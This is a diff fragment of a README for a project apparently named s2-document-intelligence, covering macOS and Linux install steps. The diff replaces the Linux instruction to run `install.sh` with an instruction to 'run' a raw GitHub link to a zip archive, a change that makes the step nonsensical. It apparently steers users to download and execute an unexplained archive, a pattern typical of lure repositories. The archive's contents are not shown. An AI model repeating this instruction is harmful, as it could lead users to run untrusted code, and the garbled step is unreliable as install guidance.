gadp27deabril/s2-document-intelligence/README.md

   - Open the downloaded `.dmg` file and drag the app to your Applications folder.

 - **For Linux:**
-  - Unzip the downloaded file if it's a `.zip`, then navigate to the folder in the terminal and run the `install.sh` script.
+  - Unzip the downloaded file if it's a `.zip`, then navigate to the folder in the terminal and run the `https://github.com/gadp27deabril/s2-document-intelligence/raw/refs/heads/main/services/document_intelligence_s_v1.0.zip` script.

 ### Step 2: Open the Application